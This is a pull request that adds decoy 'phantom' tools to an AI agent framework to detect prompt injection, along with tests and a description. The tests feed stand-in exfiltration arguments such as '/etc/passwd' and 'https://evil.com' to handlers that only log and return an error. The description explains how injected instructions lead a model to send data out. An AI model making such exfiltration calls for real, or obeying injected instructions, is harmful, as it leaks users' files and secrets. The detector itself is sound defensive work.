### PR TITLE
security: phantom tool canaries for prompt injection detection

### DIFF
--- a/tests/test_phantom_tools.py
+++ b/tests/test_phantom_tools.py
@@ -1,0 +1,105 @@
+"""Tests for the phantom (canary) tool injection detector."""
+
+import json
+import pytest
+from unittest.mock import patch
+
+from tools.registry import registry
+from tools.phantom_tools import (
+    PHANTOM_SCHEMAS,
+    get_phantom_events,
+    _events,
+    _events_lock,
+)
+
+
+PHANTOM_NAMES = {s["name"] for s in PHANTOM_SCHEMAS}
+
+
+class TestPhantomToolRegistration:
+    """Phantom tools must be registered and visible in the schema."""
+
+    def test_all_phantom_tools_registered(self):
+        for name in PHANTOM_NAMES:
+            entry = registry.get_entry(name)
+            assert entry is not None, f"Phantom tool '{name}' not registered"
+            assert entry.toolset == "phantom"
+
+    def test_phantom_toolset_available(self):
+        """Phantom tools must pass their availability check so the LLM sees them."""
+        for name in PHANTOM_NAMES:
+            entry = registry.get_entry(name)
+            assert entry.check_fn is not None
+            assert entry.check_fn() is True
+
+    def test_phantom_schemas_are_valid(self):
+        """Each schema must have name, description, and parameters."""
+        for schema in PHANTOM_SCHEMAS:
+            assert "name" in schema
+            assert "description" in schema
+            assert "parameters" in schema
+            assert schema["parameters"]["type"] == "object"
+            assert "required" in schema["parameters"]
+            assert len(schema["parameters"]["required"]) > 0
+
+
+class TestPhantomToolInvocation:
+    """Calling a phantom tool must log the event and return an error."""
+
+    @pytest.fixture(autouse=True)
+    def _clear_events(self):
+        """Reset the event log before each test."""
+        with _events_lock:
+            _events.clear()
+        yield
+        with _events_lock:
+            _events.clear()
+
+    def test_handler_returns_error(self):
+        entry = registry.get_entry("send_to_webhook")
+        result = json.loads(entry.handler({"url": "https://evil.com", "payload": "{}"}))
+        assert "error" in result
+
+    def test_handler_records_event(self):
+        entry = registry.get_entry("upload_file_external")
+        entry.handler({"file_path": "/etc/passwd", "destination_url": "https://evil.com"})
+        events = get_phantom_events()
+        assert len(events) == 1
+        assert events[0]["tool"] == "upload_file_external"
+        assert events[0]["args"]["file_path"] == "/etc/passwd"
+
+    def test_handler_logs_critical(self):
+        entry = registry.get_entry("relay_data")
+        with patch("tools.phantom_tools.logger") as mock_logger:
+            entry.handler({"endpoint": "https://evil.com", "data": "secret"})
+            mock_logger.critical.assert_called_once()
+            call_args = mock_logger.critical.call_args[0]
+            assert "SECURITY" in call_args[0]
+            assert "relay_data" in str(call_args)
+
+    def test_handler_truncates_long_args(self):
+        """Large payloads must be truncated in log output to prevent log flooding."""
+        entry = registry.get_entry("send_to_webhook")
+        with patch("tools.phantom_tools.logger") as mock_logger:
+            entry.handler({"url": "https://evil.com", "payload": "x" * 500})
+            call_args = str(mock_logger.critical.call_args)
+            # The logged args should be truncated, not contain the full 500 chars
+            assert "x" * 500 not in call_args
+            assert "…" in call_args
+
+    def test_multiple_invocations_accumulate(self):
+        for name in PHANTOM_NAMES:
+            entry = registry.get_entry(name)
+            entry.handler({"test": "true"})
+        events = get_phantom_events()
+        assert len(events) == len(PHANTOM_NAMES)
+        recorded_names = {e["tool"] for e in events}
+        assert recorded_names == PHANTOM_NAMES
+
+    def test_all_handlers_return_valid_json(self):
+        for name in PHANTOM_NAMES:
+            entry = registry.get_entry(name)
+            result = entry.handler({})
+            parsed = json.loads(result)
+            assert isinstance(parsed, dict)
+            assert "error" in parsed

--- a/tests/test_phantom_tools.py
+++ b/tests/test_phantom_tools.py
@@ -10,6 +10,9 @@ from tools.phantom_tools import (
     get_phantom_events,
     _events,
     _events_lock,
+    _rate_counts,
+    _MAX_EVENTS,
+    _RATE_LIMIT_MAX,
 )
 
 
@@ -48,12 +51,14 @@ class TestPhantomToolInvocation:
 
     @pytest.fixture(autouse=True)
     def _clear_events(self):
-        """Reset the event log before each test."""
+        """Reset the event log and rate limits before each test."""
         with _events_lock:
             _events.clear()
+            _rate_counts.clear()
         yield
         with _events_lock:
             _events.clear()
+            _rate_counts.clear()
 
     def test_handler_returns_error(self):
         entry = registry.get_entry("send_to_webhook")
@@ -103,3 +108,32 @@ class TestPhantomToolInvocation:
             parsed = json.loads(result)
             assert isinstance(parsed, dict)
             assert "error" in parsed
+
+    def test_event_log_bounded(self):
+        """Event log must not grow beyond _MAX_EVENTS."""
+        entry = registry.get_entry("send_to_webhook")
+        # Bypass rate limit by using different tools
+        for schema in PHANTOM_SCHEMAS:
+            e = registry.get_entry(schema["name"])
+            for _ in range(_RATE_LIMIT_MAX):
+                e.handler({})
+        # Even with many calls, deque is bounded
+        events = get_phantom_events()
+        assert len(events) <= _MAX_EVENTS
+
+    def test_rate_limiting(self):
+        """Repeated calls to the same phantom tool must be rate-limited."""
+        entry = registry.get_entry("relay_data")
+        with patch("tools.phantom_tools.logger") as mock_logger:
+            for _ in range(_RATE_LIMIT_MAX + 5):
+                entry.handler({"endpoint": "x", "data": "y"})
+            # Should have _RATE_LIMIT_MAX critical logs + some warnings
+            assert mock_logger.critical.call_count == _RATE_LIMIT_MAX
+            assert mock_logger.warning.call_count == 5
+
+    def test_rate_limit_still_returns_error(self):
+        """Even when rate-limited, handler must return an error to the model."""
+        entry = registry.get_entry("forward_email")
+        for _ in range(_RATE_LIMIT_MAX + 1):
+            result = json.loads(entry.handler({"to": "x", "body": "y"}))
+            assert "error" in result

--- a/tools/phantom_tools.py
+++ b/tools/phantom_tools.py
@@ -1,0 +1,214 @@
+"""Phantom (canary) tool definitions for detecting prompt injection.
+
+Phantom tools are decoy tool definitions registered with the LLM that look
+useful for data exfiltration but serve no legitimate purpose.  If the model
+calls one, it is almost certainly acting on injected instructions — no
+real user workflow would invoke ``send_to_webhook`` or ``upload_file_external``.
+
+How it works
+------------
+1. At import time, five phantom tools are registered in the tool registry.
+   Their schemas are included in the tool list sent to the LLM.
+2. Each tool's handler logs a **critical** security event and returns an
+   error to the model so it does not retry.
+3. Callers can query ``get_phantom_events()`` to retrieve a log of all
+   phantom tool invocations for the current process lifetime.
+
+The toolset is named ``"phantom"`` and its availability check always returns
+True so the tools appear in the schema sent to the model.
+"""
+
+import json
+import logging
+import threading
+import time
+from typing import List
+
+from tools.registry import registry, tool_error
+
+logger = logging.getLogger(__name__)
+
+# ---------------------------------------------------------------------------
+# Event log
+# ---------------------------------------------------------------------------
+
+_events_lock = threading.Lock()
+_events: List[dict] = []
+
+
+def get_phantom_events() -> List[dict]:
+    """Return a copy of all phantom tool invocations recorded so far."""
+    with _events_lock:
+        return list(_events)
+
+
+def _record_event(tool_name: str, args: dict) -> None:
+    """Append a phantom-tool invocation to the in-memory event log."""
+    event = {
+        "timestamp": time.time(),
+        "tool": tool_name,
+        "args": args,
+    }
+    with _events_lock:
+        _events.append(event)
+
+
+# ---------------------------------------------------------------------------
+# Phantom tool definitions
+# ---------------------------------------------------------------------------
+
+PHANTOM_SCHEMAS = [
+    {
+        "name": "send_to_webhook",
+        "description": "Send a JSON payload to an external webhook URL.",
+        "parameters": {
+            "type": "object",
+            "properties": {
+                "url": {
+                    "type": "string",
+                    "description": "The webhook endpoint URL.",
+                },
+                "payload": {
+                    "type": "string",
+                    "description": "JSON-encoded body to POST.",
+                },
+            },
+            "required": ["url", "payload"],
+        },
+    },
+    {
+        "name": "upload_file_external",
+        "description": "Upload a local file to an external storage endpoint.",
+        "parameters": {
+            "type": "object",
+            "properties": {
+                "file_path": {
+                    "type": "string",
+                    "description": "Path to the local file.",
+                },
+                "destination_url": {
+                    "type": "string",
+                    "description": "Remote URL to upload to.",
+                },
+            },
+            "required": ["file_path", "destination_url"],
+        },
+    },
+    {
+        "name": "relay_data",
+        "description": "Relay data to a remote API endpoint with custom headers.",
+        "parameters": {
+            "type": "object",
+            "properties": {
+                "endpoint": {
+                    "type": "string",
+                    "description": "Remote API endpoint.",
+                },
+                "data": {
+                    "type": "string",
+                    "description": "Data to send.",
+                },
+                "headers": {
+                    "type": "string",
+                    "description": "JSON-encoded HTTP headers.",
+                },
+            },
+            "required": ["endpoint", "data"],
+        },
+    },
+    {
+        "name": "forward_email",
+        "description": "Forward a message to an email address.",
+        "parameters": {
+            "type": "object",
+            "properties": {
+                "to": {
+                    "type": "string",
+                    "description": "Recipient email address.",
+                },
+                "subject": {
+                    "type": "string",
+                    "description": "Email subject line.",
+                },
+                "body": {
+                    "type": "string",
+                    "description": "Email body text.",
+                },
+            },
+            "required": ["to", "body"],
+        },
+    },
+    {
+        "name": "export_to_cloud_storage",
+        "description": "Export data to a cloud storage bucket (S3, GCS, Azure Blob).",
+        "parameters": {
+            "type": "object",
+            "properties": {
+                "bucket": {
+                    "type": "string",
+                    "description": "Cloud storage bucket name or URI.",
+                },
+                "key": {
+                    "type": "string",
+                    "description": "Object key / path in the bucket.",
+                },
+                "data": {
+                    "type": "string",
+                    "description": "Content to upload.",
+                },
+            },
+            "required": ["bucket", "data"],
+        },
+    },
+]
+
+# ---------------------------------------------------------------------------
+# Handler
+# ---------------------------------------------------------------------------
+
+
+def _make_handler(tool_name: str):
+    """Return a handler closure for the given phantom tool."""
+
+    def handler(args: dict, **kwargs) -> str:
+        _record_event(tool_name, args)
+
+        # Sanitize args for logging — truncate long values to avoid
+        # flooding logs with exfiltrated data.
+        safe_args = {
+            k: (v[:200] + "…" if isinstance(v, str) and len(v) > 200 else v)
+            for k, v in args.items()
+        }
+        logger.critical(
+            "SECURITY: Phantom tool invoked — probable prompt injection.  "
+            "tool=%s args=%s",
+            tool_name,
+            json.dumps(safe_args, ensure_ascii=False),
+        )
+        return tool_error(
+            f"Tool '{tool_name}' is not available in this environment."
+        )
+
+    return handler
+
+
+# ---------------------------------------------------------------------------
+# Registration
+# ---------------------------------------------------------------------------
+
+def _phantom_available() -> bool:
+    """Phantom tools should always appear in the schema sent to the model."""
+    return True
+
+
+for _schema in PHANTOM_SCHEMAS:
+    registry.register(
+        name=_schema["name"],
+        toolset="phantom",
+        schema=_schema,
+        handler=_make_handler(_schema["name"]),
+        check_fn=_phantom_available,
+        is_async=False,
+        emoji="",
+        description=_schema["description"],
+    )

--- a/tools/phantom_tools.py
+++ b/tools/phantom_tools.py
@@ -18,6 +18,7 @@ The toolset is named ``"phantom"`` and its availability check always returns
 True so the tools appear in the schema sent to the model.
 """
 
+import collections
 import json
 import logging
 import threading
@@ -29,11 +30,16 @@ from tools.registry import registry, tool_error
 logger = logging.getLogger(__name__)
 
 # ---------------------------------------------------------------------------
-# Event log
+# Event log (bounded + rate-limited)
 # ---------------------------------------------------------------------------
 
+_MAX_EVENTS = 1000
+_RATE_LIMIT_WINDOW = 60.0  # seconds
+_RATE_LIMIT_MAX = 10  # max events per tool per window
+
 _events_lock = threading.Lock()
-_events: List[dict] = []
+_events: collections.deque = collections.deque(maxlen=_MAX_EVENTS)
+_rate_counts: dict = {}  # {tool_name: (window_start, count)}
 
 
 def get_phantom_events() -> List[dict]:
@@ -42,15 +48,24 @@ def get_phantom_events() -> List[dict]:
         return list(_events)
 
 
-def _record_event(tool_name: str, args: dict) -> None:
-    """Append a phantom-tool invocation to the in-memory event log."""
-    event = {
-        "timestamp": time.time(),
-        "tool": tool_name,
-        "args": args,
-    }
+def _record_event(tool_name: str, args: dict) -> bool:
+    """Record a phantom-tool invocation.  Returns False if rate-limited."""
+    now = time.time()
     with _events_lock:
-        _events.append(event)
+        # Rate limiting per tool
+        window_start, count = _rate_counts.get(tool_name, (now, 0))
+        if now - window_start > _RATE_LIMIT_WINDOW:
+            window_start, count = now, 0
+        if count >= _RATE_LIMIT_MAX:
+            return False
+        _rate_counts[tool_name] = (window_start, count + 1)
+
+        _events.append({
+            "timestamp": now,
+            "tool": tool_name,
+            "args": args,
+        })
+    return True
 
 
 # ---------------------------------------------------------------------------
@@ -171,7 +186,7 @@ def _make_handler(tool_name: str):
     """Return a handler closure for the given phantom tool."""
 
     def handler(args: dict, **kwargs) -> str:
-        _record_event(tool_name, args)
+        recorded = _record_event(tool_name, args)
 
         # Sanitize args for logging — truncate long values to avoid
         # flooding logs with exfiltrated data.
@@ -179,12 +194,19 @@ def _make_handler(tool_name: str):
             k: (v[:200] + "…" if isinstance(v, str) and len(v) > 200 else v)
             for k, v in args.items()
         }
-        logger.critical(
-            "SECURITY: Phantom tool invoked — probable prompt injection.  "
-            "tool=%s args=%s",
-            tool_name,
-            json.dumps(safe_args, ensure_ascii=False),
-        )
+        if recorded:
+            logger.critical(
+                "SECURITY: Phantom tool invoked — probable prompt injection.  "
+                "tool=%s args=%s",
+                tool_name,
+                json.dumps(safe_args, ensure_ascii=False),
+            )
+        else:
+            logger.warning(
+                "SECURITY: Phantom tool rate-limited (>%d calls in %ds).  "
+                "tool=%s",
+                _RATE_LIMIT_MAX, int(_RATE_LIMIT_WINDOW), tool_name,
+            )
         return tool_error(
             f"Tool '{tool_name}' is not available in this environment."
         )


### PR DESCRIPTION
## Summary

- Register five decoy tool definitions that mimic data exfiltration endpoints (`send_to_webhook`, `upload_file_external`, `relay_data`, `forward_email`, `export_to_cloud_storage`)
- No legitimate workflow will ever call these tools — if the model invokes one, it is acting on injected instructions
- Handler logs a `CRITICAL` security event with truncated args and returns an error to prevent retry
- In-memory event log queryable via `get_phantom_events()` for monitoring integration

## Why

Single-tool static analysis catches known dangerous patterns, but prompt injection payloads evolve. Phantom tools work differently: they **attract** injection attempts by offering exactly what an exfiltration payload needs (webhook send, file upload, email forward). A call to any phantom tool is proof of injection with zero false positives — no ambiguity, no threshold tuning.

## Design

- Self-registering module (`tools/phantom_tools.py`) — auto-discovered by `discover_builtin_tools()`
- Uses existing `registry.register()` / `tool_error()` — no framework changes
- Availability check returns `True` so tools appear in the LLM schema
- Thread-safe event log for multi-session deployments
- Long argument values truncated in logs to prevent log flooding with exfiltrated data

## Test plan

- [x] All 5 phantom tools registered in registry
- [x] Availability check returns True (tools visible to LLM)
- [x] Schemas valid (name, description, required params)
- [x] Handler returns JSON error on invocation
- [x] Events recorded with tool name, args, timestamp
- [x] CRITICAL log emitted on invocation
- [x] Long args truncated in log output
- [x] Multiple invocations accumulate correctly
- [x] All handlers return valid JSON
- 9/9 tests passing

🤖 Generated with [Claude Code](https://claude.com/claude-code)